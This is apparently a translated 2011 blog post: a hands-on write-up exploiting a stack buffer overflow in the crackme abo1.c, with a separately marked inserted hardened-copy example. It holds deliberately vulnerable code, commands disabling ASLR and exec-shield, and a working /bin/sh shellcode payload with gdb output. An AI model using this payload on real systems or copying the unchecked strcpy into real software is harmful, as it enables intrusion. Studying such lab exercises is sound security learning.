Wednesday 16 March 2011

buffer overflow on the moon of shadow

hooooooo it's been ages since I wrote anything on this blog. tonight, after chatting (well, venting) about work stuff with didik, we ended up going on about reverse engineering.
this post is just my own notes anyway, no plans to jump for joy when I see a so-called segmentation fault. didik gave me some crackme sources just to poke at, really. example 1, a source called abo1.c, looks like this:


#include <string.h>

/* abo1.c: the classic crackme. argv/argc are named the wrong way round,
   but the body only ever uses the second one as the argument vector. */
int main(int argv, char **argc) {
    char buf[256];

    /* no length check: anything longer than 255 bytes runs off the end of buf */
    strcpy(buf, argc[1]);
    return 0;
}
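As an added example (not code from the original post or from the crackme), here is abo1.c's copy next to a bounded form: the hardened version refuses anything that would not fit in buf instead of writing past it. bounded_copy and abo1_copy are names I made up for this illustration; the page defines neither.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* abo1.c's pattern: no length check at all, so an argument longer than
 * 255 bytes (plus the NUL) runs past buf into whatever sits above it.
 * Kept only for contrast; never call it with data you do not control. */
void abo1_copy(char *buf, const char *src) {
    strcpy(buf, src);
}

/* Hardened replacement (hypothetical helper, not from the crackme).
 * Returns 0 and copies src when it fits, including the terminating NUL;
 * returns -1 and leaves dst as an empty string otherwise, so the caller
 * gets an explicit error instead of a silent truncation or an overflow. */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    /* strnlen stops at dst_size, so an unterminated src cannot be
     * walked past the limit just to measure it. */
    size_t len = strnlen(src, dst_size);
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

int main(int argc, char **argv) {
    char buf[BUF_SIZE];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long: max %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes, nothing overwritten\n", strlen(buf));
    return 0;
}
```

Run it with the same 269-byte argument the post uses and it exits with an error instead of a segfault.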



ok, first turn off a couple of protections, ASLR and exec-shield:

sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/randomize_va_space
sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/exec-shield
sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/exec-shield-randomize

but you have to sudo su first. if you want to turn them back on, just write 1 instead.
ok, now compile the abo1.c above (don't forget the option that turns off the default stack protector, -fno-stack-protector) and then run it with a perl one-liner like below:


sikopet@sikopet-an:~/Downloads/krekme$ gcc -fno-stack-protector abo1.c -o abo1test
sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "A"x10'`

if nothing happens, just keep raising that 10 until you hit the segmentation fault, like below

sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "A"x269'`

ok, once you have that, try it in gdb

sikopet@sikopet-an:~/Downloads/krekme$ gdb ./abo1test
GNU gdb (GDB) 7.2-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /home/sikopet/Downloads/krekme/abo1test...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x269'`
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x269'`

Program received signal SIGSEGV, Segmentation fault.
0x00140043 in ?? () from /lib/libc.so.6

/* cococococombo breaker */
now try going up or down until EIP is 0x41414141; that happens at 272.
/* cococococombo breaker */

(gdb) r `perl -e 'print "A"x272'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x272'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

/* cococococombo breaker */
if you don't believe EIP is that value, just type i r
/* cococococombo breaker */

(gdb) i r
eax 0xbffff1a0 -1073745504
ecx 0x0 0
edx 0x111 273
ebx 0x288ff4 2658292
esp 0xbffff2b0 0xbffff2b0
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

/* cococococombo breaker */
0x41 = 'A'
/* cococococombo breaker */

now let's try a return address; let's just use deadbeef as the example return address,
so it looks like this: 0xdeadbeef (the return address is 4 bytes, since 2 hex characters count as 1 byte)
so our full payload from above is 272 bytes - 4 bytes = 268 bytes.
here I'm just using a common shellcode, since I can't write shellcode myself yet.

common shellcode: "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

that common shellcode is 25 bytes, so 268 - 25 = 243 bytes.
so the layout is going to look roughly like this, usually called the attack vector

[A characters filling the rest of the 268 bytes][shellcode 25 bytes][return address 4 bytes] /* attack vector */

now let's look at the return address 0xdeadbeef, converted to little endian
de ad be ef -> ef be ad de <-- that's little endian
then add the \x escapes so it becomes \xef\xbe\xad\xde; that is the address of our fake return address.
ok, now let's run it with a perl one-liner like below, with the shellcode and that fake return address. the syntax is roughly this:

`perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`


sikopet@sikopet-an:~/Downloads/krekme$ gdb ./abo1test
Reading symbols from /home/sikopet/Downloads/krekme/abo1test...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`

Program received signal SIGSEGV, Segmentation fault.
0x00deadbe in ?? ()

/* cococococombo breaker */
try raising it to 244
/* cococococombo breaker */

(gdb) r `perl -e 'print "A"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()

(gdb) i r
eax 0xbffff1a0 -1073745504
ecx 0x0 0
edx 0x111 273
ebx 0x288ff4 2658292
esp 0xbffff2b0 0xbffff2b0
ebp 0x80cd0bb0 0x80cd0bb0
esi 0x0 0
edi 0x0 0
eip 0xdeadbeef 0xdeadbeef
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51


/* cococococombo breaker */
yep, EIP is now filled with the fake return address, which means the shellcode is 24 bytes, not 25 :p. now let's check ESP: type x/10s $esp in gdb, then keep hitting enter until you find TERM or SHELL
/* cococococombo breaker */

(gdb) x/10s $esp
0xbffff2b0: ""
0xbffff2b1: ""
0xbffff2b2: ""
0xbffff2b3: ""
0xbffff2b4: "T\363\377\277`\363\377\277H\370\377\267"
0xbffff2c1: "\364\377\277\377\377\377\377\364\317\022"
0xbffff2cc: ",\202\004\b\001"
0xbffff2d2: ""
0xbffff2d3: ""
0xbffff2d4: "\020\363\377\277V\341\021"
(gdb)
/* cococococombo breaker */
keep hitting enter until it comes out like below.
/* cococococombo breaker */
(gdb)
0xbffff4cc: "/home/sikopet/Downloads/krekme/abo1test"
0xbffff4f4: 'A' ...
0xbffff5bc: 'A' , "1\300Ph//shh/bin\211\343PS\211ᙰ\v̀ᆳ",
0xbffff605: "ORBIT_SOCKETDIR=/tmp/orbit-sikopet"
0xbffff628: "SSH_AGENT_PID=1491"
0xbffff63b: "SHELL=/bin/bash"
0xbffff64b: "TERM=xterm"
0xbffff656: "XDG_SESSION_COOKIE=87be01b5d31c11d12ebb47b40000000b-1300270010.310578-2047811633"
0xbffff6a7: "WINDOWID=58915617"
0xbffff6b9: "GNOME_KEYRING_CONTROL=/tmp/keyring-6ofpaj"
(gdb)


riiight, that "repeats 200 times" stuff is the NOPs a.k.a. no-operation, whose byte value is 0x90. right below the NOPs is the real return address, 0xbffff5c0; convert it to little endian and add the \x escapes.
0xbffff5c0 -> \xc0\xf5\xff\xbf /* the real return address */

now try running it like below.

sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "\x90"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xc0\xf5\xff\xbf"'`
$ whoami
sikopet

/* cococococombo breaker */
yay, so with the command above, when abo1test runs, what actually runs is the shellcode. that's roughly it.
/* cococococombo breaker */

alright, that's it, I'm off to watch Harry Potter now.
the file can be downloaded here
